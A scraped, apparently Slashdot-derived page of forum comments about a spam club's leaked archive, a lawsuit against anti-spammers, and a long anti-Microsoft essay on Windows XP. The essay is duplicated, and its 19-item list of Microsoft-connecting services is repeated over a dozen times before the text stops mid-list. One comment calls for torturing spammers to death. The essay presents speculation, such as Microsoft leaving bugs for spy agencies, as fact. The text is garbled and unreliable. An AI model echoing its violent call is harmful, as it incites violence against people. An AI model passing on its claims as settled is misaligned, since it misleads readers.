Slashdot Mirror

What's the difference between these remarkle advertising vehicles? Don't be left without the proper knowledge when sending out your offering to the masses. Along with our other various How Tos, learn the difference before any mailing.

I have never felt so good to be part of the Slashdot effect.

BTW, as pointed to in the article, a list of members was posted to Usenet w/a list of memberships. There was also a link to an archive of the contents of the site; here's a link:

http://jscript.dk/2003/8/thebulkclub.com.zip

and a mirror:

http://saintaardvarkthecarpeted.com/thebulkclub.co m/thebulkclub.com.zip

A list of the files in the archive can be found here:

http://saintaardvarkthecarpeted.com/thebulkclub.co m/contents.txt

Grab a copy and post your own links!

EmarketsAmerica.org is run by an incompetent baffoon as a front to some of the sleaziest spammers in existance.

They've been harrassing the people named in the lawsuit for months, if not years now, and this is just their latest method of doing so.

What's disturbing about this harrassment in particular, is that they're using tax payers' money by abusing the US courts as a means to go after their arch-enemies, the anti-spammers.

The actual filing papers can be found from a mirror (PDF file).

Read it, and have a wonderful belly laugh over it. It's so insanely inaccurate, rambling and straightout kooky that no judge is going to take it seriously.

Proletariat of the world, unite to kill spammers. Remember to shoot the knees first, so that they can't run away while you slowly torture them to death.

1. Application Layer Gateway Service (Requires server rights.)
2. Fax Service
3. File Signature Verification
4. Generic Host Process for Win32 Services (Requires server rights.)
5. Microsoft Application Error Reporting
6. Microsoft Baseline Security Analyzer
7. Microsoft Direct Play Voice Test
8. Microsoft Help and Support Center
9. Microsoft Help Center Hosting Server (Wants server rights.)
10. Microsoft Management Console
11. Microsoft Media Player (tells Microsoft the music you like)
12. Microsoft Network Availability Test
13. Microsoft Volume Shadow Copy Service
14. MS DTC Console program
15. Run DLL as an app
16. Services and Controller app
17. Time Service, sets the time on your computer from Microsoft's computer.
18. Microsoft Office keeps a number in each file you create that identifies your computer. Microsoft has never said why.
19. Microsoft mouse software has reduced functionality until you let it connect to Microsoft computers.

1. Application Layer Gateway Service (Requires server rights.)
2. Fax Service
3. File Signature Verification
4. Generic Host Process for Win32 Services (Requires server rights.)
5. Microsoft Application Error Reporting
6. Microsoft Baseline Security Analyzer
7. Microsoft Direct Play Voice Test
8. Microsoft Help and Support Center
9. Microsoft Help Center Hosting Server (Wants server rights.)
10. Microsoft Management Console
11. Microsoft Media Player (tells Microsoft the music you like)
12. Microsoft Network Availability Test
13. Microsoft Volume Shadow Copy Service
14. MS DTC Console program
15. Run DLL as an app
16. Services and Controller app
17. Time Service, sets the time on your computer from Microsoft's computer.
18. Microsoft Office keeps a number in each file you create that identifies your computer. Microsoft has never said why.
19. Microsoft mouse software has reduced functionality until you let it connect to Microsoft computers.

1. Application Layer Gateway Service (Requires server rights.)
2. Fax Service
3. File Signature Verification
4. Generic Host Process for Win32 Services (Requires server rights.)
5. Microsoft Application Error Reporting
6. Microsoft Baseline Security Analyzer
7. Microsoft Direct Play Voice Test
8. Microsoft Help and Support Center
9. Microsoft Help Center Hosting Server (Wants server rights.)
10. Microsoft Management Console
11. Microsoft Media Player (tells Microsoft the music you like)
12. Microsoft Network Availability Test
13. Microsoft Volume Shadow Copy Service
14. MS DTC Console program
15. Run DLL as an app
16. Services and Controller app
17. Time Service, sets the time on your computer from Microsoft's computer.
18. Microsoft Office keeps a number in each file you create that identifies your computer. Microsoft has never said why.
19. Microsoft mouse software has reduced functionality until you let it connect to Microsoft computers.

Thought this was appropriate..

"I've heard WinXP removed the cmd/command prompt."

No, Microsoft didn't remove the CMD.EXE or COMMAND.COM prompt from Windows XP. But Windows XP has reduced functionality, in many ways, not just in the command line. The command line is a big embarrassment because of its limited capabilities, but at least in Win 95 it worked. With every version since then it has worked less well. (There are two kinds of command prompt, and, according to Microsoft employees, the differences between them are not documented.)

The command line prompt sometimes begins to display short file names. Microsoft employees say that Microsoft has no fix, although someone not connected with Microsoft did make a work-around.

Cutting and pasting into a command line program often puts successive extra spaces before each line. Microsoft employees say that there is no plan to fix this.

The fast paste mode that is in Windows 98 is gone in Windows XP. Microsoft employees say there is no plan to fix this.

When using the command line interface, Windows XP doesn't always update the time. After several hours, the time reported to command line programs can be several hours in error.

There is a DOS program called START.EXE that can be used to start other programs. But it does operate the same way as in other versions of Windows. It starts a program, but cannot be made to return control to the command line program as previous versions did. There is no technical reason for this; it is just one of the shortcomings that are allowed to exist.

People often say that DOS has gone away. But Microsoft still calls the command line interface DOS, and in Windows XP Microsoft has added new programs for configuring the OS that work only under DOS.

Sometimes when you press a key while using Windows XP, it is seconds until there is any response. Apparently there is something wrong with the CPU scheduler in XP, because there are a lot of complaints about this in the forums and MS people have said that they are working on it. On one particular fresh installation of XP, on an Intel motherboard with either a Matrox G550 or an ATI Radeon video adapter, it requires 18 seconds to display a directory listing of 94 items. This is apparently related to a bug in the video software, not the adapter drivers.

Something is wrong with the Alt-Tab display of running programs under Windows XP. If there are a lot of programs, not all of them are displayed. The order jumps around in a seemingly random way.

Although articles often say negative things about Microsoft, I've never seen an article that fully documents how bad the situation really is. Microsoft's management is so bad that the company has become self-destructive. For example, Windows XP is spyware. Here is a list of ways Windows XP connects to Microsoft's servers:

1. Application Layer Gateway Service (Requires server rights.)
2. Fax Service
3. File Signature Verification
4. Generic Host Process for Win32 Services (Requires server rights.)
5. Microsoft Application Error Reporting
6. Microsoft Baseline Security Analyzer
7. Microsoft Direct Play Voice Test
8. Microsoft Help and Support Center
9. Microsoft Help Center Hosting Server (Wants server rights.)
10. Microsoft Management Console
11. Microsoft Media Player (tells Microsoft the music you like)
12. Microsoft Network Availability Test
13. Microsoft Volume Shadow Copy Service
14. MS DTC Console program
15. Run DLL as an app
16. Services and Controller app
17. Time Service, sets the time on your computer from Microsoft's computer.
18. Microsoft Office keeps a number in each file you create that identifies your computer. Microsoft has never said why.
19. Microsoft mouse software has reduced functionality until you let it connect to Microsoft computers.

These are just the ones I know. There may be others.

So, if you use Windows XP, your computer is dependent on Microsoft computers. That's bad, not only because you lose control over your possession, but because Microsoft produces buggy software and doesn't patch bugs quickly. For example, as of July 7, 2002, there are 18 unpatched security holes in Microsoft Internet Explorer. This is a terrible record for a company that has $40 billion in the bank. Obviously, with that kind of money, Microsoft could fix the bugs if it wanted to fix them. Since the bugs are very public and Microsoft has the money, it seems reasonable to suppose that top management at Microsoft has deliberately decided that the bugs should remain, at least for now.

It seems possible that there is a connection between all the bugs and the U.S. government's friendly treatment of Microsoft's law-breaking . The U.S. government's CIA and FBI and NSA departments spy on the entire world, and unpatched vulnerabilities in Microsoft software help spies.

Windows XP, and all current Windows operating systems, have a file called the registry in which configuration information is written. If this one (large, often fragmented) file becomes corrupted, the only way of recovering may be to re-format the hard drive, re-install the operating system, and then re-install and re-configure all the applications. The registry file is a single, very vulnerable, point of failure. Microsoft apparently designed it this way to provide copy protection. Since most entries in the registry are poorly documented or not documented, the registry effectively prevents control by the user.

Note that Microsoft does not support making functional complete backups under Windows XP. Look at Microsoft's policy about this: Q314828 Microsoft Policy on Disk Duplication of Windows XP Installation . Only those who work with Microsoft software will understand the true meaning of Microsoft's policy. Since almost all programs use the registry operating system file, if you cannot make a functional copy of the operating system you cannot make a functional copy of all your application installations and configurations. There are other software companies that try to fix this, but they don't work well, and Microsoft can, of course, break their implementations, as they have often done with other kinds of competitors.

Because the configuration information for the motherboard and the configuration information for the are mixed together in the registry file, the registry tends to prevent you from moving a hard drive to a computer with a different motherboard. That's another implication of the above Microsoft policy. So, if you have a motherboard failure, and a good complete backup, you may not be able to recover unless you have a spare computer with the same motherboard.

Note that Windows XP Professional can support only ten simultaneous incoming network connections. If you want more than that, you must use Windows 2000 server, and pay much, much more. (There is no Windows XP server yet.) Many businesses have very light network traffic; they just move files from staff member to staff member; they really don't need a dedicated server computer. The staff computers could easily handle the load except for this artificial limitation.

Apparently because the Windows XP GUI comes from Windows 98, Windows XP has the same problem with desktop icons that Windows 98 has. The icons sometimes flicker. Sometimes they move themselves around, particularly after the user switches monitor resolutions. Also, sometimes the taskbar settings un-configure themselves, as they do in Windows 98.

Only technically knowledgeable people know how to avoid signing up for a Microsoft Passport account during initial use of Windows XP. The name Passport gives an indication of Microsoft's thinking. A passport is a document issued by a sovereign nation. Without it, the nation's citizens cannot travel, and, if they leave, won't be allowed back in their own country. In Microsoft's corporate thinking, the company seems to be moving in the direction of believing that they own the user's computer. Most people are both honest and intimidated. Apparently about 95% do whatever they are asked on the screen. They give their personal information to Microsoft. They don't realize that, if they feel forced to get a Passport account, they should enter almost completely fictitious information, since the real question is not "What is your name and address", but "Can we invade your privacy". The honest answer to this is "No, you cannot invade my privacy", and the only effective way to communicate that is to give completely fictitious information. Since it is the educated people who have computers, Microsoft is building a database of the personal lives of educated people. Microsoft knows when they connect and from what IP address (which tends to show the area), what kind of help they ask, and information about what they are doing with their computers, including what music they like. It is not known, and there is no way to know, how much Microsoft or other organizations make use of this information, or their plans for future use.

Not only has Windows XP definitely gone further in the direction of allowing the user less control over his or her own machine, but with Palladium, Microsoft apparently intends to finish the job: Microsoft will have ultimate control over the user's computer and therefore all his or her data. Even now, under Windows XP, a recent security patch requires that the user agree to a contract that gives Microsoft administrator privileges over the user's computer . The contract says that if a user wants to patch his or her system against a bug which would allow an attack over the Internet, he or she must give Microsoft legal control over the computer. See this article also: Microsoft's Digital Rights Management-- A Little Deeper . You may need to be a lawyer to take apart the crucial sentence. "These security related updates may disable your ability to copy and/or play Secure Content and [my emphasis] use other software on your computer" legally includes this meaning: "These updates may disable your ability to use other software on your computer." Note that the term "security related updates" is meaningless to the user because the updates have no relation to user security. So, the sentence effectively means that Microsoft can control the user's computer without notice and whenever it wants. That kind of sentence is known in psychology as "testing the limits". If there is no strong public complaint about this, expect to see more and stronger language like this.

This Register article shows the direction Microsoft is going: MS Palladium protects IT vendors, not you . Absolute power corrupts absolutely, and Microsoft is well down that road. See this ZDNet article, also: MS: Why we can't trust your 'trustworthy' OS .

Microsoft's self-destructiveness does not mean that the user should be self-destructive. There is no need to apologize for using Microsoft software. The correct solution to abuse is persuading the abuser to stop being abusive. Once I posted to a Slashdot story a link to an article on a web site of mine. By far the majority of visitors from the Slashdot story used Microsoft operating systems. Rather than feel embarrassed because Microsoft is abusive, action needs to be taken to prevent the abuse. If you are against Microsoft abuse, you are not against Microsoft; you are more pro-Microsoft than Bill Gates.

These Microsoft policies mean that any government which wants to be independent of the United States government, and any government which represents itself as controlled by the people, cannot use Microsoft operating systems, or other Microsoft proprietary systems.

1. Application Layer Gateway Service (Requires server rights.)
2. Fax Service
3. File Signature Verification
4. Generic Host Process for Win32 Services (Requires server rights.)
5. Microsoft Application Error Reporting
6. Microsoft Baseline Security Analyzer
7. Microsoft Direct Play Voice Test
8. Microsoft Help and Support Center
9. Microsoft Help Center Hosting Server (Wants server rights.)
10. Microsoft Management Console
11. Microsoft Media Player (tells Microsoft the music you like)
12. Microsoft Network Availability Test
13. Microsoft Volume Shadow Copy Service
14. MS DTC Console program
15. Run DLL as an app
16. Services and Controller app
17. Time Service, sets the time on your computer from Microsoft's computer.
18. Microsoft Office keeps a number in each file you create that identifies your computer. Microsoft has never said why.
19. Microsoft mouse software has reduced functionality until you let it connect to Microsoft computers.

1. Application Layer Gateway Service (Requires server rights.)
2. Fax Service
3. File Signature Verification
4. Generic Host Process for Win32 Services (Requires server rights.)
5. Microsoft Application Error Reporting
6. Microsoft Baseline Security Analyzer
7. Microsoft Direct Play Voice Test
8. Microsoft Help and Support Center
9. Microsoft Help Center Hosting Server (Wants server rights.)
10. Microsoft Management Console
11. Microsoft Media Player (tells Microsoft the music you like)
12. Microsoft Network Availability Test
13. Microsoft Volume Shadow Copy Service
14. MS DTC Console program
15. Run DLL as an app
16. Services and Controller app
17. Time Service, sets the time on your computer from Microsoft's computer.
18. Microsoft Office keeps a number in each file you create that identifies your computer. Microsoft has never said why.
19. Microsoft mouse software has reduced functionality until you let it connect to Microsoft computers.

1. Application Layer Gateway Service (Requires server rights.)
2. Fax Service
3. File Signature Verification
4. Generic Host Process for Win32 Services (Requires server rights.)
5. Microsoft Application Error Reporting
6. Microsoft Baseline Security Analyzer
7. Microsoft Direct Play Voice Test
8. Microsoft Help and Support Center
9. Microsoft Help Center Hosting Server (Wants server rights.)
10. Microsoft Management Console
11. Microsoft Media Player (tells Microsoft the music you like)
12. Microsoft Network Availability Test
13. Microsoft Volume Shadow Copy Service
14. MS DTC Console program
15. Run DLL as an app
16. Services and Controller app
17. Time Service, sets the time on your computer from Microsoft's computer.
18. Microsoft Office keeps a number in each file you create that identifies your computer. Microsoft has never said why.
19. Microsoft mouse software has reduced functionality until you let it connect to Microsoft computers.

1. Application Layer Gateway Service (Requires server rights.)
2. Fax Service
3. File Signature Verification
4. Generic Host Process for Win32 Services (Requires server rights.)
5. Microsoft Application Error Reporting
6. Microsoft Baseline Security Analyzer
7. Microsoft Direct Play Voice Test
8. Microsoft Help and Support Center
9. Microsoft Help Center Hosting Server (Wants server rights.)
10. Microsoft Management Console
11. Microsoft Media Player (tells Microsoft the music you like)
12. Microsoft Network Availability Test
13. Microsoft Volume Shadow Copy Service
14. MS DTC Console program
15. Run DLL as an app
16. Services and Controller app
17. Time Service, sets the time on your computer from Microsoft's computer.
18. Microsoft Office keeps a number in each file you create that identifies your computer. Microsoft has never said why.
19. Microsoft mouse software has reduced functionality until you let it connect to Microsoft computers.

Windows XP Shows the Direction Microsoft is Going.

"I've heard WinXP removed the cmd/command prompt."

No, Microsoft didn't remove the CMD.EXE or COMMAND.COM prompt from Windows XP. But Windows XP has reduced functionality, in many ways, not just in the command line. The command line is a big embarrassment because of its limited capabilities, but at least in Win 95 it worked. With every version since then it has worked less well. (There are two kinds of command prompt, and, according to Microsoft employees, the differences between them are not documented.)

The command line prompt sometimes begins to display short file names. Microsoft employees say that Microsoft has no fix, although someone not connected with Microsoft did make a work-around.

Cutting and pasting into a command line program often puts successive extra spaces before each line. Microsoft employees say that there is no plan to fix this.

The fast paste mode that is in Windows 98 is gone in Windows XP. Microsoft employees say there is no plan to fix this.

When using the command line interface, Windows XP doesn't always update the time. After several hours, the time reported to command line programs can be several hours in error.

There is a DOS program called START.EXE that can be used to start other programs. But it does operate the same way as in other versions of Windows. It starts a program, but cannot be made to return control to the command line program as previous versions did. There is no technical reason for this; it is just one of the shortcomings that are allowed to exist.

People often say that DOS has gone away. But Microsoft still calls the command line interface DOS, and in Windows XP Microsoft has added new programs for configuring the OS that work only under DOS.

Sometimes when you press a key while using Windows XP, it is seconds until there is any response. Apparently there is something wrong with the CPU scheduler in XP, because there are a lot of complaints about this in the forums and MS people have said that they are working on it. On one particular fresh installation of XP, on an Intel motherboard with either a Matrox G550 or an ATI Radeon video adapter, it requires 18 seconds to display a directory listing of 94 items. This is apparently related to a bug in the video software, not the adapter drivers.

Something is wrong with the Alt-Tab display of running programs under Windows XP. If there are a lot of programs, not all of them are displayed. The order jumps around in a seemingly random way.

Although articles often say negative things about Microsoft, I've never seen an article that fully documents how bad the situation really is. Microsoft's management is so bad that the company has become self-destructive. For example, Windows XP is spyware. Here is a list of ways Windows XP connects to Microsoft's servers:

1. Application Layer Gateway Service (Requires server rights.)
2. Fax Service
3. File Signature Verification
4. Generic Host Process for Win32 Services (Requires server rights.)
5. Microsoft Application Error Reporting
6. Microsoft Baseline Security Analyzer
7. Microsoft Direct Play Voice Test
8. Microsoft Help and Support Center
9. Microsoft Help Center Hosting Server (Wants server rights.)
10. Microsoft Management Console
11. Microsoft Media Player (tells Microsoft the music you like)
12. Microsoft Network Availability Test
13. Microsoft Volume Shadow Copy Service
14. MS DTC Console program
15. Run DLL as an app
16. Services and Controller app
17. Time Service, sets the time on your computer from Microsoft's computer.
18. Microsoft Office keeps a number in each file you create that identifies your computer. Microsoft has never said why.
19. Microsoft mouse software has reduced functionality until you let it connect to Microsoft computers.

These are just the ones I know. There may be others.

So, if you use Windows XP, your computer is dependent on Microsoft computers. That's bad, not only because you lose control over your possession, but because Microsoft produces buggy software and doesn't patch bugs quickly. For example, as of July 7, 2002, there are 18 unpatched security holes in Microsoft Internet Explorer. This is a terrible record for a company that has $40 billion in the bank. Obviously, with that kind of money, Microsoft could fix the bugs if it wanted to fix them. Since the bugs are very public and Microsoft has the money, it seems reasonable to suppose that top management at Microsoft has deliberately decided that the bugs should remain, at least for now.

It seems possible that there is a connection between all the bugs and the U.S. government's friendly treatment of Microsoft's law-breaking . The U.S. government's CIA and FBI and NSA departments spy on the entire world, and unpatched vulnerabilities in Microsoft software help spies.

Windows XP, and all current Windows operating systems, have a file called the registry in which configuration information is written. If this one (large, often fragmented) file becomes corrupted, the only way of recovering may be to re-format the hard drive, re-install the operating system, and then re-install and re-configure all the applications. The registry file is a single, very vulnerable, point of failure. Microsoft apparently designed it this way to provide copy protection. Since most entries in the registry are poorly documented or not documented, the registry effectively prevents control by the user.

Note that Microsoft does not support making functional complete backups under Windows XP. Look at Microsoft's policy about this: Q314828 Microsoft Policy on Disk Duplication of Windows XP Installation . Only those who work with Microsoft software will understand the true meaning of Microsoft's policy. Since almost all programs use the registry operating system file, if you cannot make a functional copy of the operating system you cannot make a functional copy of all your application installations and configurations. There are other software companies that try to fix this, but they don't work well, and Microsoft can, of course, break their implementations, as they have often done with other kinds of competitors.

Because the configuration information for the motherboard and the configuration information for the are mixed together in the registry file, the registry tends to prevent you from moving a hard drive to a computer with a different motherboard. That's another implication of the above Microsoft policy. So, if you have a motherboard failure, and a good complete backup, you may not be able to recover unless you have a spare computer with the same motherboard.

Note that Windows XP Professional can support only ten simultaneous incoming network connections. If you want more than that, you must use Windows 2000 server, and pay much, much more. (There is no Windows XP server yet.) Many businesses have very light network traffic; they just move files from staff member to staff member; they really don't need a dedicated server computer. The staff computers could easily handle the load except for this artificial limitation.

Apparently because the Windows XP GUI comes from Windows 98, Windows XP has the same problem with desktop icons that Windows 98 has. The icons sometimes flicker. Sometimes they move themselves around, particularly after the user switches monitor resolutions. Also, sometimes the taskbar settings un-configure themselves, as they do in Windows 98.

Only technically knowledgeable people know how to avoid signing up for a Microsoft Passport account during initial use of Windows XP. The name Passport gives an indication of Microsoft's thinking. A passport is a document issued by a sovereign nation. Without it, the nation's citizens cannot travel, and, if they leave, won't be allowed back in their own country. In Microsoft's corporate thinking, the company seems to be moving in the direction of believing that they own the user's computer. Most people are both honest and intimidated. Apparently about 95% do whatever they are asked on the screen. They give their personal information to Microsoft. They don't realize that, if they feel forced to get a Passport account, they should enter almost completely fictitious information, since the real question is not "What is your name and address", but "Can we invade your privacy". The honest answer to this is "No, you cannot invade my privacy", and the only effective way to communicate that is to give completely fictitious information. Since it is the educated people who have computers, Microsoft is building a database of the personal lives of educated people. Microsoft knows when they connect and from what IP address (which tends to show the area), what kind of help they ask, and information about what they are doing with their computers, including what music they like. It is not known, and there is no way to know, how much Microsoft or other organizations make use of this information, or their plans for future use.

Not only has Windows XP definitely gone further in the direction of allowing the user less control over his or her own machine, but with Palladium, Microsoft apparently intends to finish the job: Microsoft will have ultimate control over the user's computer and therefore all his or her data. Even now, under Windows XP, a recent security patch requires that the user agree to a contract that gives Microsoft administrator privileges over the user's computer . The contract says that if a user wants to patch his or her system against a bug which would allow an attack over the Internet, he or she must give Microsoft legal control over the computer. See this article also: Microsoft's Digital Rights Management-- A Little Deeper . You may need to be a lawyer to take apart the crucial sentence. "These security related updates may disable your ability to copy and/or play Secure Content and [my emphasis] use other software on your computer" legally includes this meaning: "These updates may disable your ability to use other software on your computer." Note that the term "security related updates" is meaningless to the user because the updates have no relation to user security. So, the sentence effectively means that Microsoft can control the user's computer without notice and whenever it wants. That kind of sentence is known in psychology as "testing the limits". If there is no strong public complaint about this, expect to see more and stronger language like this.

This Register article shows the direction Microsoft is going: MS Palladium protects IT vendors, not you . Absolute power corrupts absolutely, and Microsoft is well down that road. See this ZDNet article, also: MS: Why we can't trust your 'trustworthy' OS .

Microsoft's self-destructiveness does not mean that the user should be self-destructive. There is no need to apologize for using Microsoft software. The correct solution to abuse is persuading the abuser to stop being abusive. Once I posted to a Slashdot story a link to an article on a web site of mine. By far the majority of visitors from the Slashdot story used Microsoft operating systems. Rather than feel embarrassed because Microsoft is abusive, action needs to be taken to prevent the abuse. If you are against Microsoft abuse, you are not against Microsoft; you are more pro-Microsoft than Bill Gates.

These Microsoft policies mean that any government which wants to be independent of the United States government, and any government which represents itself as controlled by the people, cannot use Microsoft operating systems, or other Microsoft proprietary systems.

1. Application Layer Gateway Service (Requires server rights.)
2. Fax Service
3. File Signature Verification
4. Generic Host Process for Win32 Services (Requires server rights.)
5. Microsoft Application Error Reporting
6. Microsoft Baseline Security Analyzer
7. Microsoft Direct Play Voice Test
8. Microsoft Help and Support Center
9. Microsoft Help Center Hosting Server (Wants server rights.)
10. Microsoft Management Console
11. Microsoft Media Player (tells Microsoft the music you like)
12. Microsoft Network Availability Test
13. Microsoft Volume Shadow Copy Service
14. MS DTC Console program
15. Run DLL as an app
16. Services and Controller app
17. Time Service, sets the time on your computer from Microsoft's computer.
18. Microsoft Office keeps a number in each file you create that identifies your computer. Microsoft has never said why.
19. Microsoft mouse software has reduced functionality until you let it connect to Microsoft computers.

1. Application Layer Gateway Service (Requires server rights.)
2. Fax Service
3. File Signature Verification
4. Generic Host Process for Win32 Services (Requires server rights.)
5. Microsoft Application Error Reporting
6. Microsoft Baseline Security Analyzer
7. Microsoft Direct Play Voice Test
8. Microsoft Help and Support Center
9. Microsoft Help Center Hosting Server (Wants server rights.)
10. Microsoft Management Console
11. Microsoft Media Player (tells Microsoft the music you like)
12. Microsoft Network Availability Test
13. Microsoft Volume Shadow Copy Service
14. MS DTC Console program
15. Run DLL as an app
16. Services and Controller app
17. Time Service, sets the time on your computer from Microsoft's computer.
18. Microsoft Office keeps a number in each file you create that identifies your computer. Microsoft has never said why.
19. Microsoft mouse software has reduced functionality until you let it connect to Microsoft computers.

1. Application Layer Gateway Service (Requires server rights.)
2. Fax Service
3. File Signature Verification
4. Generic Host Process for Win32 Services (Requires server rights.)
5. Microsoft Application Error Reporting
6. Microsoft Baseline Security Analyzer
7. Microsoft Direct Play Voice Test
8. Microsoft Help and Support Center
9. Microsoft Help Center Hosting Server (Wants server rights.)
10. Microsoft Management Console
11. Microsoft Media Player (tells Microsoft the music you like)
12. Microsoft Network Availability Test
13. Microsoft Volume Shadow Copy Service
14. MS DTC Console program
15. Run DLL as an app
16. Services and Controller app
17. Time Service, sets the time on your computer from Microsoft's computer.
18. Microsoft Office keeps a number in each file you create that identifies your computer. Microsoft has never said why.
19. Microsoft mouse software has reduced functionality until you let it connect to Microsoft computers.

1. Application Layer Gateway Service (Requires server rights.)
2. Fax Service
3. File Signature Verification
4. Generic Host Process for Win32 Services (Requires server rights.)
5. Microsoft Application Error Reporting
6. Microsoft Baseline Security Analyzer
7. Microsoft Direct Play Voice Test
8. Microsoft Help and Support Center
9. Microsoft Help Center Hosting Server (Wants server rights.)
10. Microsoft Management Console
11. Microsoft Media Player (tells Microsoft the music you like)
12. Microsoft Network Availability Test
13. Microsoft Volume Shadow Copy Service
14. MS DTC Console program
15. Run DLL as an app
16. Services and Controller app
17. Time Service, sets the time on your computer from Microsoft's computer.
18. Microsoft Office keeps a number in each file you create that identifies your computer. Microsoft has never said why.
19. Microsoft mouse software has reduced functionality until you let it connect to Microsoft computers.

1. Application Layer Gateway Service (Requires server rights.)
2. Fax Service
3. File Signature Verification
4. Generic Host Process for Win32 Services (Requires server rights.)
5. Microsoft Application Error Reporting
6. Microsoft Baseline Security Analyzer
7. Microsoft Direct Play Voice Test
8. Microsoft Help and Support Center
9. Microsoft Help Center Hosting Server (Wants server rights.)
10. Microsoft Management Console
11. Microsoft Media Player (tells Microsoft the music you like)
12. Microsoft Network Availability Test
13. Microsoft Volume Shadow Copy Service
14. MS DTC Console program
15. Run DLL as an app
16. Services and Controller app
17. Time Service, sets the time on your computer from Microsoft's computer.
18. Microsoft Office keeps a number in each file you create that identifies your computer. Microsoft has never said why.
19. Microsoft mouse software has reduced functionality until you let it connect to Microsoft computers.

1. Application Layer Gateway Service (Requires server rights.)
2. Fax Service
3. File Signature Verification
4. Generic Host Process for Win32 Services (Requires server rights.)
5. Microsoft Application Error Reporting
6. Microsoft Baseline Security Analyzer
7. Microsoft Direct Play Voice Test
8. Microsoft Help and Support Center
9. Microsoft Help Center Hosting Server (Wants server rights.)
10. Microsoft Management Console
11. Microsoft Media Player (tells Microsoft the music you like)
12. Microsoft Network Availability Test
13. Microsoft Volume Shadow Copy Service
14. MS DTC Console program
15. Run DLL as an app
16. Services and Controller app
17. Time Service, sets the time on your computer from Microsoft's computer.
18. Microsoft Office keeps a number in each file you create that identifies your computer. Microsoft has never said why.
19. Microsoft mouse software has reduced functionality until you let it connect to Microsoft computers.

1. Application Layer Gateway Service (Requires server rights.)
2. Fax Service
3. File Signature Verification
4. Generic Host Process for Win32 Services (Requires server rights.)
5. Microsoft Application Error Reporting
6. Microsoft Baseline Security Analyzer
7. Microsoft Direct Play Voice Test
8. Microsoft Help and Support Center
9. Microsoft Help Center Hosting Server (Wants server rights.)
10. Microsoft Management Console
11. Microsoft Media Player (tells Microsoft the music you like)
12. Microsoft Network Availability Test
13. Microsoft Volume Shadow Copy Service
14. MS DTC Console program
15. Run DLL as an app
16. Services and Controller app
17. Time Service, sets the time on your computer from Microsoft's computer.
18. Microsoft Office keeps a number in each file you create that identifies your computer. Microsoft has never said why.
19. Microsoft mouse software has reduced functionality until you let it connect to Microsoft computers.

1. Application Layer Gateway Service (Requires server rights.)
2. Fax Service
3. File Signature Verification
4. Generic Host Process for Win32 Services (Requires server rights.)
5. Microsoft Application Error Reporting
6. Microsoft Baseline Security Analyzer
7. Microsoft Direct Play Voice Test
8. Microsoft Help and Support Center
9. Microsoft Help Center Hosting Server (Wants server rights.)
10. Microsoft Management Console
11. Microsoft Media Player (tells Microsoft the music you like)
12. Microsoft Network Availability Test
13. Microsoft Volume Shadow Copy Service
14. MS DTC Console program
15. Run DLL as an app
16. Services and Controller app
17. Time Service, sets the time on your computer from Microsoft's computer.
18. Microsoft Office keeps a number in each file you create that identifies your computer. Microsoft has never said why.
19. Microsoft mouse software has reduced functionality until you let it connect to Microsoft computers.

1. Application Layer Gateway Service (Requires server rights.)
2. Fax Service
3. File Signature Verification
4. Generic Host Process for Win32 Services (Requires server rights.)
5. Microsoft Application Error Reporting
6. Microsoft Baseline Security Analyzer
7. Microsoft Direct Play Voice Test
8. Microsoft Help and Support Center
9. Microsoft Help Center Hosting Server (Wants server rights.)
10. Microsoft Management Console
11. Microsoft Media Player (tells Microsoft the music you like)
12. Microsoft Network Availability Test
13. Microsoft Volume Shadow Copy Service
14. MS DTC Console program
15. Run DLL as an app
16. Services and Controller app
17. Time Service, sets the time on your computer from Microsoft's computer.
18. Microsoft Office keeps a number in each file you create that identifies your computer. Microsoft has never said why.
19. Microsoft mouse software has reduced functionality until you let it connect to Microsoft computers.

1. Application Layer Gateway Service (Requires server rights.)
2. Fax Service
3. File Signature Verification
4. Generic Host Process for Win32 Services (Requires server rights.)
5. Microsoft Application Error Reporting
6. Microsoft Baseline Security Analyzer
7. Microsoft Direct Play Voice Test
8. Microsoft Help and Support Center
9. Microsoft Help Center Hosting Server (Wants server rights.)
10. Microsoft Management Console
11. Microsoft Media Player (tells Microsoft the music you like)
12. Microsoft Network Availability Test
13. Microsoft Volume Shadow Copy Service
14. MS DTC Console program
15. Run DLL as an app
16. Services and Controller app
17. Time Service, sets the time on your computer from Microsoft's computer.
18. Microsoft Office keeps a number in each file you create that identifies your computer. Microsoft has never said why.
19. Microsoft mouse software has reduced functionality until you let it connect to Microsoft computers.

1. Application Layer Gateway Service (Requires server rights.)
2. Fax Service
3. File Signature Verification
4. Generic Host Process for Win32 Services (Requires server rights.)
5. Microsoft Application Error Reporting
6. Microsoft Baseline Security Analyzer
7. Microsoft Direct Play Voice Test
8. Microsoft Help and Support Center
9. Microsoft Help Center Hosting Server (Wants server rights.)
10. Microsoft Management Console
11. Microsoft Media Player (tells Microsoft the music you like)
12. Microsoft Network Availability Test
13. Microsoft Volume Shadow Copy Service
14. MS DTC Console program
15. Run DLL as an app
16. Services and Controller app
17. Time Service, sets the time on your computer from Microsoft's computer.
18. Microsoft Office keeps a number in each file you create that identifies your computer. Microsoft has never said why.
19. Microsoft mouse software has reduced functionality until you let it connect to Microsoft computers.

1. Application Layer Gateway Service (Requires server rights.)
2. Fax Service
3. File Signature Verification
4. Generic Host Process for Win32 Services (Requires server rights.)
5. Microsoft Application Error Reporting
6. Microsoft Baseline Security Analyzer
7. Microsoft Direct Play Voice Test
8. Microsoft Help and Support Center
9. Microsoft Help Center Hosting Server (Wants server rights.)
10. Microsoft Management Console
11. Microsoft Media Player (tells Microsoft the music you like)
12. Microsoft Network Availability Test
13. Microsoft Volume Shadow Copy Service
14. MS DTC Console program
15. Run DLL as an app
16. Services and Controller app
17. Time Service, sets the time on your computer from Microsoft's computer.
18. Microsoft Office keeps a number in each file you create that identifies your computer. Microsoft has never said why.
19. Microsoft mouse software has reduced functionality until you let it connect to Microsoft computers.

1. Application Layer Gateway Service (Requires server rights.)
2. Fax Service
3. File Signature Verification
4. Generic Host Process for Win32 Services (Requires server rights.)
5. Microsoft Application Error Reporting
6. Microsoft Baseline Security Analyzer
7. Microsoft Direct Play Voice Test
8. Microsoft Help and Support Center
9. Microsoft Help Center Hosting Server (Wants server rights.)
10. Microsoft Management Console
11. Microsoft Media Player (tells Microsoft the music you like)
12. Microsoft Network Availability Test
13. Microsoft Volume Shadow Copy Service
14. MS DTC Console program
15. Run DLL as an app
16. Services and Controller app
17. Time Service, sets the time on your computer from Microsoft's computer.
18. Microsoft Office keeps a number in each file you create that identifies your computer. Microsoft has never said why.
19. Microsoft mouse software has reduced functionality until you let it connect to Microsoft computers.

1. Application Layer Gateway Service (Requires server rights.)
2. Fax Service
3. File Signature Verification
